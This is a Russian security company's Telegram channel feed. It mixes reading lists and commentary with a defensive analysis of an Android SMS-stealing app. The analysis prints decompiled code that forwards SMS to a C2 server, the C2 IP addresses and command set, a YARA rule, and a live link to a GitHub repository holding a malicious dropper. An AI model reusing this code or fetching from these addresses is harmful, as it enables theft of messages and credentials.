Рекриптор
228 subscribers
88 photos
12 videos
3 files
263 links
Заметки на полях о практической безопасности и не только
Download Telegram
В Калужской Бауманке прошла Неделя Безопасника.

Небольшая конференция, соревнования CTF, мастер-классы. Были рады поучаствовать: помочь с ресурсами, провести мастер-класс по реверсингу. Соревнования CTF, учитывая,что участвовали младшие курсы, прошли, на наш взгляд, вполне достойно. Крайне радует инициативность студентов, которые организовали эти соревнования. Ребята, вы большие молодцы! Продолжайте в том же духе, а мы вам, конечно, поможем! Далее будем сотрудничать с Бауманкой ещё активнее, у заинтересованных сторон есть желание и ресурсы. Ну а незаинтересованных мы попросту не возьмём в эту лодку ;)

Обещал список интересных, на мой взгляд, работ и ссылок про ИИ в области ИБ. Их на самом деле довольно много, но вот то, что, на мой взгляд, самое вкусное:

Защита

Winter, P., Lampesberger, H., Zeilinger, M., Hermann, E. (2011). On Detecting Abrupt Changes in Network Entropy Time Series. In: De Decker, B., Lapon, J., Naessens, V., Uhl, A. (eds) Communications and Multimedia Security. CMS 2011. Lecture Notes in Computer Science, vol 7025. Springer, Berlin, Heidelberg. https://doi.org/10.1007/978-3-642-24712-5_18

Jaafer Al-Saraireh, Ala' Masarweh, A novel approach for detecting advanced persistent threats, Egyptian Informatics Journal, Volume 23, Issue 4, 2022, Pages 45-55, ISSN 1110-8665, https://doi.org/10.1016/j.eij.2022.06.005

Do Xuan, C. . (2021). Detecting APT Attacks Based on Network Traffic Using Machine Learning. Journal of Web Engineering, 20(1), 171–190. https://doi.org/10.13052/jwe1540-9589.2019

Hasan, M.M., Islam, M.U. & Uddin, J. Advanced Persistent Threat Identification with Boosting and Explainable AI. SN COMPUT. SCI. 4, 271 (2023). https://doi.org/10.1007/s42979-023-01744-x

Щелкунова Н.В, Щелкунов Д.А, О статическом анализе исполняемых файлов на содержание вредоносного кода, РусКрипто-2024 https://ruscrypto.ru/resource/archive/rc2024/files/06_shelkunov_shelkunova.pdf

Cylance Data Team, Introduction to Artificial Intelligence for Security Professionals
Sharma, Sanjay & Challa, Rama & Sahay, Sanjay. (2019). Detection of Advanced Malware by Machine Learning Techniques. 10.48550/arXiv.1903.02966.

Bensaoud, Ahmed & Abudawaood, Nawaf & Kalita, Jugal. (2020). Classifying Malware Images with Convolutional Neural Network Models. 10.48550/arXiv.2010.16108.

Rhode, Matilda & Burnap, Pete & Jones, Kevin. (2017). Early Stage Malware Prediction Using Recurrent Neural Networks. Computers & Security. 77. 10.1016/j.cose.2018.05.010.

Chaoxian Wei, Qiang Li, Dong Guo, Xiangyu Meng, Toward Identifying APT Malware through API System Calls, Security and Communication Networks, vol. 2021, Article ID 8077220, 14 pages, 2021. https://doi.org/10.1155/2021/8077220

S. M. Milajerdi, R. Gjomemo, B. Eshete, R. Sekar, and V. Venkatakrishnan, “Holmes: Real-time apt detection through correlation of suspicious information flows,” in Symposium on Security and Privacy. IEEE, 2019.

M. Barre, A. Gehani, and V. Yegneswaran, “Mining data provenance to detect advanced persistent threats,” in 11th International Workshop on Theory and Practice of Provenance (TaPP), 2019

Xueyuan Han, Thomas F. J.-M. Pasquier, Adam Bates, James Mickens, Margo I. Seltzer, Unicorn: Runtime Provenance-Based Detector for Advanced Persistent Threats. NDSS, 2020, doi:10.14722/ndss.2020.2

Нападение

https://github.com/TheR1D/shell_gpt

https://github.com/aress31/burpgpt

https://github.com/protectai/vulnhuntr

Hilario, E., Azam, S., Sundaram, J. et al. Generative AI for pentesting: the good, the bad, the ugly. Int. J. Inf. Secur. 23, 2075–2097 (2024). https://doi.org/10.1007/s10207-024-00835-x

Happe, Andreas & Cito, Jürgen. (2023). Getting pwn'd by AI: Penetration Testing with Large Language Models. 10.48550/arXiv.2308.00121.

Richard Fang, Rohan Bindu, Akul Gupta, Qiusi Zhan, Daniel Kang. Teams of LLM Agents can Exploit Zero-Day Vulnerabilities. https://doi.org/10.48550/arXiv.2406.01637


#почитать #ии #offensive #антивирус
👍11
Про аналоговую "криптографию" и зачем нужно скремблирование сигнала

Что делать, если сигнал аналоговый и его нужно как-то пошифровать? Казалось бы, ответ на поверхности: АЦП - шифратор - ЦАП. Есть надёжные блочные и поточные шифры. Их много, выбирай на вкус. Такие удивительные инженерные решения действительно встречаются не так уж редко. Стоят каких-то денег. Зачастую денег не таких уж и маленьких, ибо компоненты, обвязка и программирование дороги.

Интересно вот что: инженеры, создающие такие устройства, как и те, кто ставит им такие удивительные задачи, перед тем как погрузиться в эту занимательную работу, понимают, почему сигнал изначально аналоговый? Если да, то тут всё понятно. Если нет, то ... надо что-то делать с университетской базой. Ключевым преимуществом аналоговых систем является расстояние в совокупности с ценой. Что такое помеха в аналоговом телевидении? Это вы будете видеть картинку с помехами (ну там будет немного снега, волны могут пойти небольшие), понимая при этом, что на ней. Неприятно, но можно работать. Что такое помеха в цифровом телевидении? Кубики и регулярная пропажа изображения. При неустойчивом приёме цифрового сигнала теряются пакеты. Все с этим сталкивались так или иначе - телевидение то у всех сейчас цифровое. Эту проблему пытаются победить помехоустойчивым кодированием, которое тоже требует ресурсов и не является панацеей: мы добавляем в пакет проверочные биты, тем самым удлиняя его, а число ошибок, которые код может исправить, невелико. Чем больше ошибок может исправить код, тем больше избыточность и тем выше вероятность нахватать ещё ошибок.

Что мы имеем, когда втыкаем АЦП - шифрование - ЦАП в полностью аналоговую систему, скажем, перед модулятором? Мы сводим ключевое преимущество аналоговой передачи контента (большое расстояние при небольшой цене) на нет. Если шифр блочный в режиме ECB, то плохо, ибо лавинный эффект (изменение одного бита шифротекста приведёт к совершенно другому тексту при расшифровке). Если поточный, то не особо лучше, ибо костыли с синхронизацией состояний ГПСЧ, которые крутятся на передатчике и приёмнике. Короче, городить протоколы поверх. А, ну и временной лаг, ибо все эти математические операции требуют ресурсов, как и АЦП с ЦАП-ом. Полсекунды запросто.

А как воткнуть хоть какое-то шифрование в полностью аналоговую систему, чтобы и качество не ухудшилось, и задержек почти не было, и ценник был небольшим? Есть такая штука: скремблирование. Это изменение непосредственно самого аналогового сигнала без его "оцифровки". Тут много подходов, начиная с простого фазового инвертора на одном транзисторе, заканчивая, например, вот такими вещами с использованием теории Хаоса для генерации маскирующего сигнала: https://ieeexplore.ieee.org/document/5174046

#криптография #скремблер
👍4
Малварь под Linux эволюционирует, а злоумышленники серьёзно нацеливаются на Linux -системы. Интенсивно растёт как число вредоносов, так и их качество и технологичность. Совершенствуются и технологии защиты от обнаружения. Для сокрытия вредоносной активности часто используются руткиты. Вот хороший пример: https://xakep.ru/2024/12/17/pumakit/
В общем, всё ещё используемый иногда тезис "у меня Linux, поэтому я никому не нужен" безнадёжно устарел. Анализа логов тоже недостаточно. Нужна полноценная endpoint-защита

#malware #антивирус
👍4
Ни убавить - ни прибавить. Всяких телеграмов тоже касается
Заодно передаю пламенный привет всем участникам ежегодной акции «сдай ЦРУ всех известных тебе сотрудников ФСБ с помощью мессенджера WhatsApp». Никак вы, блядь, не научитесь 😩
This media is not supported in your browser
VIEW IN TELEGRAM
Никуда не скроешься от цепкого электронного взгляда нашего Ковальски :)
По сравнению с более ранними версиями алгоритмы и модели стали гораздо быстрее и качественнее. Объект (в данном случае я) обнаруживается, классифицируется, сопровождается. Модель под капотом данной версии умеет классифицировать несколько объектов одновременно. Всё это работает на одноплатнике ценой около 6 т.р.

#видеоаналитика #ии #ковальски #робототехника
👍2🔥2
Долго думал, что написать в новогоднем посте нашего уютного корпоративного бложика. За год столько всего произошло, что одного поста будет мало. Потому решил кратко: мы серьёзно подросли, выполнили все планы, стартовали ряд новых направлений. Ковальски подтверждает. В Новом Году желаем всем здоровья, успехов, благополучия и всех благ!
👍5
Пока каникулы, прочитал Обработка естественного языка в действии
Неплохое введение в NLP (Natural Language Processing). Из плюсов: довольно свежий обзор используемого мат. аппарата и алгоритмов за исключением, пожалуй, трансформеров и больших языковых моделей.
Из минусов: перевод так себе.
Не знаю, отнести это к плюсам или минусам: подробного описания алгоритмов и подходов нет, отражена только суть. Подробности нужно гуглить. К прочтению однозначно рекомендую хотя бы для расширения кругозора

#почитать
Хороший блог с хорошими статьями по анализу малвари: https://exploitreversing.com/

#почитать #реверсинг
👍1
Давно ожидаемое в том числе и нами набирает обороты. В отрасли ИБ тоже. Дальше будет веселее. Уже сейчас некоторые модели неплохо справляются в том числе с задачами реверсинга и поиска уязвимостей. Всё, что можно автоматизировать, будет автоматизировано. Как в нападении, так и в защите. Тем, кто учится на ИБ-специальностях сейчас, нужно учитывать этот долгий тренд и уметь как работать с моделями, так и понимать в общих чертах, что там под капотом. Хорошо, что мы давно делаем ставку на автоматизацию и ИИ: развиваем и усиливаем нашу команду ИИ, разрабатываем и внедряем новые модели.

Выше публиковали список интересных работ про ИИ в области ИБ. Не лишним будет напомнить.

#ии
👍3
Мошенническая активность

Будьте внимательны сами и расскажите своим близким. Злоумышленники под видом архива с фотографиями рассылают российским пользователем мессенджеров вредоносное приложение. Сообщение с вредоносным вложением может быть получено в том числе и от хорошо знакомых людей или родственников. Если пользователь установит его на свой смартфон, то злоумышленники смогут получать, читать, отправлять СМС-сообщения, получат доступ к контактам, смогут совершать звонки по мобильной связи. Это приведёт к краже аккаунтов, доступу к банковским счетам жертвы.

Расскажите близким людям, что, если вложение требует установки чего-то, а на устройстве появляются предупреждающие сообщения, как на скриншоте, то это вредоносная активность и устанавливать ничего не нужно.

Подробный анализ будет позже.
IP-адрес командного центра вредоносного приложения: 89.23.102.250
Общение с ним осуществляется по протоколу WebSocket

#offensive #malware #фишинг
👍3😱1🤨1
Как и обещали, подробности по мошеннической активности, о которой говорили ранее.

Итак, если пользователь согласится установить вредоносное приложение, Android выведет список разрешений, необходимых этому приложению для работы. Среди них доступ к камере, доступ к контактам, доступ к файлам, доступ к микрофону, доступ к СМС.

После запуска приложение инициирует подключение к С2-серверу, IP-адрес которого – 89.23.102.250 (общение происходит по протоколу WebSocket), и отправляет ему 3 пакета с информацией об устройстве, в которую входят модель, версия Android, тип подключения, название и идентификаторы вредоносного приложения, номер телефона и оператор мобильной связи жертвы, сохранённые СМС-сообщения с мобильного телефона жертвы, список установленных приложений с версиями пакетов и иконками.

Четвёртый пакет содержит команду серверу:
{"action":"retransmission"}

На что сервер отвечает:
{"action": "retransmission", "number": "NUMBER"}


Далее вредоносное приложение переходит в режим ожидания, в котором получает Ping-пакет, отвечает на него Pong и отправляет пакет с информацией об устройстве, в которую входят модель, версия Android, тип подключения.

Загрузив зараженный apk-файл в декомпилятор и открыв файл «AndroidManifest.xml», мы увидим, что данное приложение требует доступ к конфиденциальной информации пользователя, а именно:
• Получение, чтение и отправка СМС
<uses-permission
name="android.permission.RECEIVE_SMS" />
<uses-permission
name="android.permission.READ_SMS" />
<uses-permission
name="android.permission.SEND_SMS" />

• Доступ к телефонным звонкам
<uses-permission
name="android.permission.READ_PHONE_STATE" />
<uses-permission
name="android.permission.READ_PHONE_NUMBERS" />
<uses-permission
name="android.permission.READ_CALL_LOG" />
<uses-permission
name="android.permission.CALL_PHONE" />

Ресиверы СМС и ММС :
android:name="ru.cvv.core.SMSBroadcastReceiver"
permission="android.permission.BROADCAST_SMS"
exported="true"
android:tag="⟨STRING_DECODE_ERROR⟩">
<intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
<action
android:name="android.provider.Telephony.SMS_RECEIVED"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
<action
android:name="android.provider.Telephony.SMS_DELIVER"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
</intent-filter>


android:name="ru.cvv.core.MmsReceiver"
permission="android.permission.BROADCAST_WAP_PUSH"
exported="true"
android:tag="⟨STRING_DECODE_ERROR⟩">
<intent-filter android:tag="⟨STRING_DECODE_ERROR⟩">
<action
android:name="android.provider.Telephony.WAP_PUSH_DELIVER"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
<data
android:mimeType="application/vnd.wap.mms-message"
android:tag="⟨STRING_DECODE_ERROR⟩"/>
</intent-filter>

#offensive #malware #фишинг
👍1
Продолжение

SMS-ресивер
используется для обработки полученного СМС-сообщения на смартфоне и отправки его на командный сервер. Нагрузка находится в методе onReceive() класса SMSBroadcastReceiver:
. . . 
new Thread(new a(i4, displayOriginatingAddress, sb2)).start(); // <- нагрузка
ContentValues contentValues = new ContentValues();
contentValues.put("address", displayOriginatingAddress);
contentValues.put("body", sb2);
contentValues.put("type", (Integer) 1);
contentValues.put("date", Long.valueOf(System.currentTimeMillis()));
. . .

Объект а реализует отправку полученного сообщения на С2-сервер:
. . .
if (MyWebSocketListener.f3863f != null) {
JSONObject jSONObject = new JSONObject();
jSONObject.put("action", "incoming");
jSONObject.put("sender", str);
jSONObject.put("body", str2);
jSONObject.put("subscription_id", i4);
MyWebSocketListener.f3863f.send(jSONObject.toString());
break;


MMS-ресивер
в исследуемой версии никак не реализован:
public final void onReceive(Context context, Intent intent) {}

WS-сервис

<service
name="ru.cvv.core.WebSocketService"
exported="false"
android:foregroundServiceType="dataSync"
android:tag="⟨STRING_DECODE_ERROR⟩"/>

WebSocketService

Класс WebSocketService создан незаметно работать в фоне. При инициализации вызывает функцию create_realwebsocket ()
public final int onStartCommand(Intent intent, int i3, int i4) {
Log.d("WebSocketService", "Service onStartCommand");
. . .
create_realwebsocket();
return 1;
}

которая создает объект RealWebSocket(). Также этот класс реализует сбор информации с устройства.

Класс RealWebSocket осуществляет общение с С2 по протоколу WebSocket. Он получает от сервера сообщения и может отправлять свои. В методе connect() происходит создание класса MyWebSocketListener и вызов метода init_MyWebSocketListener(). MyWebSocketListener используется для создания собранной информации с устройства в пакет и последующей отправки на сервер.

Команды сервера
В методе onReadMessage() класса RealWebSocket заданы команды, которые необходимо выполнить при получении той или иной команды:
• send_call – на указанный в поле «number» полученной команды будет произведен звонок
• retransmission – на номер телефона, указанного в поле «number» будет отправлена СМС с содержимым переменных: unique_id;;worker;;worker_id
• send_sms – на указанный в поле «number» телефонный номер будет отправлен текст, содержащийся в «message»
• get_message_history – на сервер отправляются СМС, сохраненные на телефоне
• get_perm_list – на сервер отправляется список разрешений приложения
• get_app_list – отправляются установленные приложения
• get_calls_history – на сервер отправляет история звонков
• get_sim_list – на сервер отправляются номер телефона и сотовый оператор

Выводы

Совершенно очевидно, что данный экземпляр вредоносного приложения далеко не единственный. Это следует хотя бы из наличия нескольких идентификаторов вредоносной сборки, которая отправляется во втором пакете при старте вредоносного приложения:
• unique_id - уникальный id
• current_app - информация о текущем приложении:
◦ app_name
◦ worker
◦ worker_id
◦ webview_url
◦ build_type
Об этом же свидетельствует и наличие единcтвенного IP-адреса в экземпляре вредоноса: злоумышленники не хотят "палить" несколько серверов сразу. Им проще потерять один из C2-серверов вместе с привязанными к нему приложениями. Это говорит и о времени жизни атаки с использованием данного конкретного экземпляра вредоноса: оно невелико. Но экземпляров, судя по всему, немало, как и C2-серверов

#offensive #malware #фишинг
👍3
Были запросы хэша этого вредоноса. Ниже yara-правило. Хэш там тоже есть

import "hash"

rule photo_archive : banker {
meta:
author = "re-crypt"

strings:
$pk = { 50 4B }
$package_name = "ru.cvv.core" wide ascii
$str = "HIDDEN SMS " ascii
$apk_sig_v2 = {B4 80 8D D4 CF E0 37 7F 88 6F 7D 5E 6F 8E 8F 9D 39 B6 BD DF 09 11 A2 D0 BE 75 DC 67 8B 71 3E A5 0F 5C 3C AD BD 28 2D 67 6C A6 93 D4 1A 47 78 0A51 9F B6 69 83 F1 8B 9A 71 73 CA A2 E9 ED 04 20 15 63 BC 92 B5 58 77 B7 30 BF 1A A1 93 C2 EE 18 A9 95 77 7C B7 90 5B 6F 2B DF E4 DE 0D F1 33 25 56 17 1B A6 2E A8 4B 69 63 08 5E EB 4F A2 DE 01 A6 54 71 84 03 BB 06 50 15 EC 92 5A AA 7C EA 6C A7 35 21 37 22 74 C1 33 0F D8 B9 EE 9A 5C 29 D2 FC 5E 02 28 C2 A9 CA F1 AF 35 FD 37 A3 D4 97 10 9C FC 01 19 75 93 48 6B 6F 3D B8 CD 8B 9B E1 1E DB 8B 95 88 E1 09 D6 87 31 92 0C 92 50 BB 03 E6 62 18 47 48 B2 0F 4A 7B 82 44 ED 63 99 0B 9A C3 75 80 A7 02 DF 2A BE C1 4A E5 4A 0F 96 D5 19 F5 EF 66 A3 95 CC 8E B9 C6 9D 09 EF 13 EA 41 46 04 89 C0 69 0D 8D 72 7E 4C 9A BD 04 FB DA C3 F2 3D }
$apk_sig_v3 = {2F FF C8 AF 00 70 ED A0 90 B3 1D FC 5D FF 59 EC B8 F6 6A 0E 68 B4 E8 D5 92 6F 1E F7 44 A6 F5 51 C0 E0 BD 46 CC 7E 6F 9C 40 12 7F ED D3 CB 4D B6 0E BA B3 83 4C D5 3B 5B BD DF 60 FB C7 E9 B8 D5 E7 81 63 D0 6F BC 07 2D 79 A1 84 60 40 53 85 97 83 04 54 68 C0 AA B1 5B 4D 0E DC 29 32 63 D4 36 E5 DB 58 A7 0A A9 F0 3C 53 87 65 1C 81 F5 22 8E 9B 5C 6D FB F0 CF 24 36 98 B9 C8 D6 6B 88 DB 53 D2 35 CE 17 83 5C AF 86 0E 41 6D 9C C5 F6 09 18 EF DC 7C 4D 4B 28 3E E8 31 4B 9F 20 55 63 5A 2F FE 81 03 E3 26 DA 1F 74 80 61 83 5F 8B D2 CA FD 5A 18 99 78 BE B7 6C CC 56 F9 5A 4C 86 71 4A B9 67 1B A5 3D E0 74 02 49 32 AC 89 D9 CA 9B A3 60 BE 78 7A 19 26 77 0E EF B7 E8 88 5C A9 EA 52 E8 69 FB 8E 13 1D 51 BB 70 5E BD DE 9B 37 77 DC 9A 2C E1 E1 E9 7D 01 3F 9C 80 D9 E8 20 FC 16 7C 82}

condition:
($pk at 0 and 2) and
(hash.sha256(0,filesize) == "8b075beae0b294b158fcea470a28c72378c32e217c5548fdcce1fbc152a396c5" or
($package_name and
$str and
$apk_sig_v2 and
$apk_sig_v3))

}


#malware #offensive
👍4
Про DeepSeek

Все побежали - и я побежал (c)
Раз все (ну почти) пишут про DeepSeek, мы тоже напишем. Нам интересно порассуждать, как повлияет его появление на ИБ. Тему эту мы буквально вчера в разных узких кругах затрагивали несколько раз. Тема актуальная. Лично я считаю, всё уже случилось: сильный генеративный ИИ уже давно оказывает влияние на ИБ. Сейчас появился ещё один довольно крутой и, самое главное, доступный инструмент, который несколько лучше, на мой субъективный взгляд, чем GPT-4. Его появление ускорит уже идущие трансформации, основной тренд которых - максимальная автоматизация с одновременным ускорением всех процессов.

Если говорить про offensive security, то это автоматизация поиска уязвимостей, проникновения, закрепления, дальнейшего продвижения, получения доступа, автоматическое генерирование эксплоитов, нагрузок, троянских программ, парсеров данных и т.д. Список далеко не полный, но масштаб понятен. То, что до появления GPT-моделей делалось за дни, теперь занимает минуты. Сгенерировать заобфусцированный троян с возможностью скачивания нагрузки, проверки её подлинности и запуска на исполнение, например, на Python - 50 секунд. И он вполне работоспособен. Злоумышленников не сковывают нормы регуляторов и прочие подобные ограничения, поэтому технологии ИИ внедряются ими максимально широко и эффективно. Это уже происходит. Мы об этом много писали. Можно найти по тэгам #ии #offensive

В защите ИИ внедряется для выявления аномалий (это тоже уже давно с переменным успехом, но сейчас идёт уверенный рост) в анализируемых объектах и в их поведении, при анализе вредоносной активности и вредоносных сущностей. Автоматизируется солидная часть работы вирусных аналитиков, сотрудников SOC-центров. Мы писали об этом. Разработчики средств защиты тоже используют кодогенерацию с помощью ИИ. Это уже норма. Но, в силу организационных причин, их код внедряется не так быстро. Это может привести к запоздалым реакциям на угрозы.

Так сложилось исторически, что мы изначально при создании нашей антивирусной лаборатории сделали ставку на ИИ и максимальную автоматизацию нашей деятельности. Мы используем несколько разных моделей разной сложности, включая локально развёрнутые большие языковые модели (LLM). Часть моделей мы разработали и обучили сами. Продолжаем их совершенствовать и разрабатывать новые. Вся деятельность компании Рекрипт пронизана ИИ: от видеоаналитики до кодогенерации и анализа вредоносов. Здесь хочется сказать огромное спасибо нашим друзьям и партнёрам - компании HPC Park - за предоставленные мощности и безупречный сервис.

#ии
👍9🔥4👏1
Приехала в бумажном виде. Так читать всё-таки удобнее. Книга довольно содержательная и даёт ответы на вопросы "Почему именно так, а не иначе". Это тот самый вероятностный подход к машинному обучению. Фраза "машинное обучение " не должна смущать. В книге детально рассмотрены и трансформеры, и GPT: обоснование создания этих моделей. Есть довольно подробные главы, посвящённые сугубо теории вероятности, статистике, теории информации, линейной алгебре с упором на применение этих дисциплин в машинном обучении. В общем, рекомендуем к прочтению

#ии #почитать
Интересный документ есть в Сети про санкции и open source. В частности, про санкции U.S. OFAC (Office of Foreign Assets Control). Не люблю всякое такое, но в данном случае, на мой взгляд, эти явления окажут серьёзное влияние и на развитие open source, и на безопасность. Приведу выдержки из документа с небольшими комментариями.

The OFAC sanctions rules are “strict liability”, which means it does not matter whether you know about them or not. Violating these rules can lead to serious penalties, so it's important to understand how they might affect your open source work

Незнание не освобождает от террора. Слово ответственность мне здесь кажется не очень уместным. Террор лучше подходит.
For developers, this means you need to be cautious about who you interact with and where your contributions come from. OFAC sanctions can target specific countries, regions, and individuals or organizations, with many of the individuals and organizations listed on the Specially Designated Nationals and Blocked Persons (“SDN”) List. OFAC updates this list regularly, adding or removing names as global situations change. OFAC sanctions also apply to all entities that are owned 50% or more directly or indirectly by one or more SDN individuals or entities, whether or not the owned entity shows up on the SDN List. Some entities, such as entities owned or controlled by OFAC-sanctioned governments, may also be sanctioned but not included on the SDN List. In addition, the few comprehensively sanctioned governments, regions, and countries also are not included on the SDN List.

Здесь говорится буквально, что довольно сложно, и даже невозможно, понять, находится ли лицо, с которым взаимодействует разработчик, под санкциями или нет. Но, если их нарушить, то будут последствия, включая уголовные наказания:
Violating these sanctions can result in serious consequences, including large civil fines and criminal penalties.


При этом спектр людей и организаций, попадающих под эти "правила" достаточно широк:
In general, if you’re a U.S. citizen or a U.S.-based organization, or if you deal with U.S.-origin goods, services, or U.S. Dollars for prohibited transactions, you’re likely required to follow these rules, no matter where in the world you are.


Как это относится к open source:
The OFAC sanctions may impact common community behaviors, such as two-way collaboration on a proposed software change which could be interpreted as a prohibited provision of services.

Т.е. обсудил улучшение открытого софта с неправильными людьми - рискуешь попасть на штрафы или даже присесть. Многие ли продолжат дальше коммуницировать при таких угрозах - вопрос.
Продолжение

Если "неправильные" люди нашли ошибку в открытом софте, то взаимодействовать с ними предлагается буквально следующим образом:
In a simple example, if an SDN identified a memory bug and submitted an unsolicited patch to fix the issue, developers receiving this patch should be able to evaluate the patch on its technical merit, modify it if they see fit, and apply the patch to their repository. The SDN’s developer submitting the patch would see the patch being applied but should not be engaged in a two-way communication discussing the patch, the technical merits, or ways to improve the patch. The source code itself is informational material, but the concern is a developer crossing a line into providing a service to the SDN.

Ну т.е. давай патчи и вали, нам запрещено с тобой разговаривать. Учитывая, что определить, можно разговаривать или нельзя, не так то просто, общаться, подозреваю, перестанут со всеми подозрительными. Чтобы не было чего. Проблемы никому не нужны. Тот же смысл у этой цитаты:
Reviewing an unsolicited patch from a contributor in a sanctioned region should generally be fine, but actively engaging them to better understand their issue, diagnose the problem, or help improve a patch or modify code would likely cross the line. If the contributor is linked to a sanctioned entity or region, in general, it is best to keep communications strictly one-way. If a patch is received and you improve it and submit it upstream, that should be fine, but going back and forth in communications with the SDN developer likely would not.

Давай патч и проваливай. Многие ли будут помогать раскалывающемуся сообществу в таких условиях - вопрос, на мой взгляд, риторический.

Нет, поддержку вашего железа мы добавлять не будем:
Accepting unsolicited patches that fix general issues in your open source project should be okay. However, if the changes directly benefit a restricted party’s products or services, it could be a problem. For example, if a developer from AcmeSDN (and AcmeSDN is an SDN subject to OFAC sanctions) contributes a driver that enables the AcmeSDN processor to work in your software, that contribution would likely be an issue. Think carefully not just about the source code, but the impact of these unsolicited patches.


Ну и про права тоже надо забыть:
Many open source projects require a CLA, which would bar contributors from OFAC sanctioned entities. OFAC sanctions bar transacting in intellectual property, and specifically, any agreement in intellectual property or any other contract with an SDN. If your open source project requires a CLA, make sure your CLA validation process includes compliance checks against the SDN List.


С информационной безопасностью здесь связь прямая. При таких раскладах и отношениях репортить разработчикам открытых продуктов об уязвимостях глубокого смысла нет, как и в целом участвовать в развитии этих продуктов в рамках исходных основных веток. Те, кого ограничения ещё не коснулись, мотают на ус и задаются вопросом, а стоит ли участвовать в общем или лучше делать своё? Таким образом некогда достаточно единые сообщества раскалываются, что ведёт к ухудшению качества продуктов в основных ветках и куче небезопасных форков. В общем, выстрел в ногу, как по мне
👍2
Свежая статья про возможности PowerShell, выполнение скриптов в памяти, обход AMSI, обфускацию скриптов. Red Team-ерам, пентестерам и просто интересующимся полезно: https://medium.com/@0xHossam/powershell-exploits-modern-apts-and-their-malicious-scripting-tactics-7f98b0e8090c

#offensive
👍4
Ещё одна мошенническая активность, направленная на соискателей. Банда шахматистов

В этот раз мошенники, мимикрирующие под работодателя, ищут ни много ни мало аж целого Project Manager-а. Проект, над которым предлагается работать соискателю, кто бы сомневался, в области блокчейн. Говорят, хотят к шахматам его прикрутить. Общую схему мы уже описывали в цикле постов, она практически та же самая: находят потенциальную жертву через Linkedin, предлагают пройти собеседование, дают ссылку на проект (на этот раз в github), потенциальная жертва запускает его у себя, мошенники просят "расшарить" экран (очевидно, чтобы отслеживать и корректировать действия жертвы, имея при этом возможность визуально контролировать, в какой среде выполняется вредоносный код, и не имитируют ли жертву аналитики, пытаясь получить побольше информации о мошеннической группировке).
При запуске вредоносного кода происходит утечка данных криптокошельков, паролей и доступов к различным аккаунтам. Также скачиваются разного рода нагрузки (на Python, злоумышленники его очень любят, потому что антивирусы с ним плохо умеют работать, как и со всеми скриптовыми языками), позволяющие надёжнее закрепиться в системе жертвы и, в идеале, получить полный контроль над ней.

Из относительно интересного: вредонос старается определить, что работает в виртуальной машине (например, в песочнице) или под отладчиком. В этом случае он просто завершается и дальнейшее развитие атаки не производится.

Мошенники не обращают внимание на юрисдикции и гражданства, работая "широким гребнем". По гражданам России тоже работают. Скам - интенсивно развивающаяся международная угроза с постоянно растущим оборотом и относительно невысокими рисками для злоумышленников. Обложка журнала The Economist к этому посту от 8 февраля 2025 года об этом говорит.

Фишинговый аккаунт на github: https://github.com/wenode1002
Репозиторий с вредоносным кодом называется chess. Вредоносный имплант находится в единственном файле HEAD по этому пути: https://github.com/wenode1002/chess/tree/main/.github/logs/refs/heads/.DS_Store/
Имплант - это заобфусцированный дроппер, который обращается по адресу 94.131.107.227:1224
Следует отметить, что этот репозиторий эпизодически пропадает, а потом появляется вновь. Злодеи стараются максимально долго не спалить инструментарий, аккаунт, IP-адреса. Логично.

Наши выводы совпадают с теми, что мы делали ранее. Инструменты мошенников, следует отметить, становятся технологичнее. Сами мошенники работают изощреннее, профессиональнее и осторожнее. Забавно, что при лёгкой модификации (добавление пробела в ничего не значащее место) вредоносный имплант перестаёт обнаруживаться некоторыми чрезвычайно популярными антивирусами (на момент анализа нами так было). Не просто сигнатурным поиском, что было бы логично, но эвристическими движками 🤦‍♂️. Всё-таки антивирусная отрасль отстаёт всё сильнее от работников скрипта и топора :) Целями являются как пользователи Linux, так и пользователи Windows.

#фишинг #offensive #malware
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤‍🔥2